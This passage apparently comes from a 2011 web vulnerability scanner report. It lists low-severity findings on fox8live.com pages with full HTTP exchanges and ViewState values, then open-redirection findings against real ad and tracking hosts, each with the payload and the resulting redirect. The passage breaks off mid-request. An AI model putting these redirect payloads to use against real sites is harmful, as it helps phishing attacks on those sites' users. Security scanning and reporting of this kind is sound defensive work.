Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:39:00 GMT
Age: 4
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 5204
Connection: keep-alive
Content-Length: 5204


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE4NzE0MzUyNTdkZA==" />
...[SNIP]...

8.12. http://www.fox8live.com/content/aboutus/default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/aboutus/default.aspx

Request

GET /content/aboutus/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:34 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=121
Expires: Mon, 09 May 2011 15:40:52 GMT
Age: 43
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 29278
Connection: keep-alive
Content-Length: 29278


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE3Mjc5MTA3MTUPZBYCZg9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAgIFD2QWAgIDD2QWAgIbD2QWAmYPZBYGAgEPEA9kFgIeCG9uQ2hhbmdlBYABZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2N0bDAwX2N0bDAwX2N0bDAwX2N0bDAwX2N0bDAwX0NvbW1vblBhZ2VfU2VhcmNoQmFyX19fUG93ZXJlZEJ5Jykuc3JjID0gdGhpc1t0aGlzLnNlbGVjdGVkSW5kZXhdLmltZ1VybDsPFgJmAgEWAhAFEFNlYXJjaCBUaGlzIFNpdGUFAzI2NWcQBQ5TZWFyY2ggdGhlIFdlYgUDMjY2Z2RkAgMPD2QWAh4Kb25rZXlwcmVzcwVgcmV0dXJuIElETVRleHRCb3hLZXlQcmVzcyhldmVudCwgJ2N0bDAwX2N0bDAwX2N0bDAwX2N0bDAwX2N0bDAwX0NvbW1vblBhZ2VfU2VhcmNoQmFyX19fU2VhcmNoJyk7ZAIHDw8WAh4ISW1hZ2VVcmwFFy9pbWFnZXMvdHJhbnNwYXJlbnQuZ2lmZGQYAQVhY3RsMDAkY3RsMDAkY3RsMDAkY3RsMDAkY3RsMDAkQ29tbW9uUGFnZSRDb21tb25Cb2R5JENvbW1vbkNvbnRlbnQkQ29tbW9uUmlnaHRDb2x1bW4kY3RsMDIkXyRjdGwwMA8UKwACZGZk" />
...[SNIP]...

8.13. http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/news/lee_zurik_investigation/default.aspx

Request

GET /content/news/lee_zurik_investigation/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:44 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:41:05 GMT
Age: 39
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 40317
Connection: keep-alive
Content-Length: 40317


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

8.14. http://www.fox8live.com/content/news/seregni/default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/news/seregni/default.aspx

Request

GET /content/news/seregni/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:44 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:41:08 GMT
Age: 36
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 43733
Connection: keep-alive
Content-Length: 43733


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

8.15. http://www.fox8live.com/content/news/watercooler/default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/news/watercooler/default.aspx

Request

GET /content/news/watercooler/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/news/seregni/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:27 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:43:27 GMT
Age: 0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 27624
Connection: keep-alive
Content-Length: 27624


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

8.16. http://www.fox8live.com/default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /default.aspx

Request

GET /default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:34 GMT
Server: PWS/1.7.2.1
X-Px: rf-ms iad-agg-n30 ( iad-agg-n22), ht iad-agg-n22.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:40:50 GMT
Age: 44
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 102042
Connection: keep-alive
Content-Length: 102042


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

8.17. http://www.fox8live.com/entertainment/horoscopes/default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /entertainment/horoscopes/default.aspx

Request

GET /entertainment/horoscopes/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/aboutus/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:34 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:43:33 GMT
Age: 1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 22933
Connection: keep-alive
Content-Length: 22933


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

8.18. http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

Request

GET /mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/wireless/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:38 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n33), ms iad-agg-n33 ( origin)
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 57286
Connection: keep-alive
Content-Length: 57286


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYxNzMwOTQPZBYCZg9kFgJmD2QWAmYPZBYCZg9kFgICBQ9kFgICAw9kFgQCGw9kFgJmD2QWBgIBDxAPZBYCHghvbkNoYW5nZQV6ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2N0bDAwX2N0bDAwX2N0bDAwX2N0bDAwX0NvbW1vblBhZ2VfU2VhcmNoQmFyX19fUG93ZXJlZEJ5Jykuc3JjID0gdGhpc1t0aGlzLnNlbGVjdGVkSW5kZXhdLmltZ1VybDsPFgJmAgEWAhAFEFNlYXJjaCBUaGlzIFNpdGUFAzI2NWcQBQ5TZWFyY2ggdGhlIFdlYgUDMjY2Z2RkAgMPD2QWAh4Kb25rZXlwcmVzcwVacmV0dXJuIElETVRleHRCb3hLZXlQcmVzcyhldmVudCwgJ2N0bDAwX2N0bDAwX2N0bDAwX2N0bDAwX0NvbW1vblBhZ2VfU2VhcmNoQmFyX19fU2VhcmNoJyk7ZAIHDw8WAh4ISW1hZ2VVcmwFFy9pbWFnZXMvdHJhbnNwYXJlbnQuZ2lmZGQCJw9kFgICCQ9kFgICBQ9kFgICAQ9kFgICAQ9kFgRmD2QWAmYPZBYEAgoPDxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50AgFkZAIRD2QWAgICDxYCHgpCZWhhdmlvcklEBRZNb2RhbFdpbmRvd18yMDk1NTMzMDE5ZAICD2QWBGYPZBYCZg9kFgICAQ8PFgQfA2cfBGZkZAIBD2QWAmYPZBYCZg9kFgRmD2QWAgIBD2QWAmYPZBYCAgEPZBYCZg9kFgJmDxBkZBYBZmQCAg8WAh8FBRFfUmVwb3J0Q29udGVudF9NV2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFbGN0bDAwJGN0bDAwJGN0bDAwJGN0bDAwJENvbW1vblBhZ2UkQ29tbW9uQm9keSRDb21tb25Db250ZW50JENvbW1vbkxlZnRDb2x1bW4kTWFpbiRWJF8kRW1haWxTdG9yeVdpbmRvdyRDbG9zZQWFAWN0bDAwJGN0bDAwJGN0bDAwJGN0bDAwJENvbW1vblBhZ2UkQ29tbW9uQm9keSRDb21tb25Db250ZW50JENvbW1vbkxlZnRDb2x1bW4kTWFpbiRWJF8kRW1haWxTdG9yeVdpbmRvdyRFbWFpbFN0b3J5Q29udHJvbCRfJENvcHlUb1NlbGYFY2N0bDAwJGN0bDAwJGN0bDAwJGN0bDAwJENvbW1vblBhZ2UkQ29tbW9uQm9keSRDb21tb25Db250ZW50JENvbW1vbkxlZnRDb2x1bW4kTWFpbiRST0MkUkMkXyRNVyRDbG9zZQ==" />
...[SNIP]...

8.19. http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx

Request

GET /news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HitCount_f50e95bc-67af-48eb-8d01-767a4029b6a1_0=1; uts=12; __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:42 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n20), ms iad-agg-n20 ( origin)
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 60505
Connection: keep-alive
Content-Length: 60505


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

8.20. http://www.fox8live.com/rss/default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /rss/default.aspx

Request

GET /rss/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:43 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:41:02 GMT
Age: 41
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 27462
Connection: keep-alive
Content-Length: 27462


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

8.21. http://www.fox8live.com/widgets/serve.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /widgets/serve.aspx

Request

GET /widgets/serve.aspx?wid=b9fd9b2c-4752-4433-8ab5-6a62e33475f4&ver=1 HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:39 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=121
Expires: Mon, 09 May 2011 15:40:59 GMT
Age: 41
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 9152
Connection: keep-alive
Content-Length: 9152


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00_Head1">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

8.22. http://www.fox8live.com/wireless/default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /wireless/default.aspx

Request

GET /wireless/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:39 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=121
Expires: Mon, 09 May 2011 15:40:59 GMT
Age: 41
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 20605
Connection: keep-alive
Content-Length: 20605


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

9. Open redirection
There are 7 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:


9.1. http://bh.contextweb.com/bh/rtset [rurl parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The value of the rurl request parameter is used to perform an HTTP redirect. The payload http%3a//a8485bbedc1e828b9/a%3fhttp%3a//matcher.bidder7.mookie1.com/do-association%3freturn%3dctxweb was submitted in the rurl parameter. This caused a redirection to the following URL:

Request

GET /bh/rtset?do=add&pid=536088&ev=914804995789526&rurl=http%3a//a8485bbedc1e828b9/a%3fhttp%3a//matcher.bidder7.mookie1.com/do-association%3freturn%3dctxweb HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; vf=1; V=wOebwAz4UvVv; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.0

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web80
Cache-Control: no-cache, no-store
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Thu, 03-May-2012 15:40:05 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|536088.914804995789526.0|535461.2931142961646634775.1; Domain=.contextweb.com; Expires=Tue, 08-May-2012 15:40:05 GMT; Path=/
Location: http://a8485bbedc1e828b9/a?http://matcher.bidder7.mookie1.com/do-association?return=ctxweb
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Mon, 09 May 2011 15:40:05 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"


9.2. http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 2]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of REST URL parameter 2 is used to perform an HTTP redirect. The payload .a6edacbe47e169caa/ was submitted in the REST URL parameter 2. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /rfw/.a6edacbe47e169caa//9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$&adsafe_url=http%3A%2F%2Fwww.npr.org%2Ftemplates%2Freg%2F&adsafe_type=abdfq&adsafe_jsinfo=sl:na,em:false,v:3.6 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F435B78AAE54D6DB5E0805BB37A43C93

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Location: http://.a6edacbe47e169caa/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$
Content-Length: 0
Date: Mon, 09 May 2011 15:39:54 GMT
Connection: close


9.3. http://trc.taboolasyndication.com/log/usatoday/debug [url parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /log/usatoday/debug

Issue detail

The value of the url request parameter is used to perform an HTTP redirect. The payload http%3a//a2c78ad8ffbc313cb/a%3fhttp%3a//cdn.taboolasyndication.com/pixel.gif was submitted in the url parameter. This caused a redirection to the following URL:

Request

GET /log/usatoday/debug?type=warn&msg=rbox.css%20not%20loaded%201%20time%28s%29&id=2836&url=http%3a//a2c78ad8ffbc313cb/a%3fhttp%3a//cdn.taboolasyndication.com/pixel.gif HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
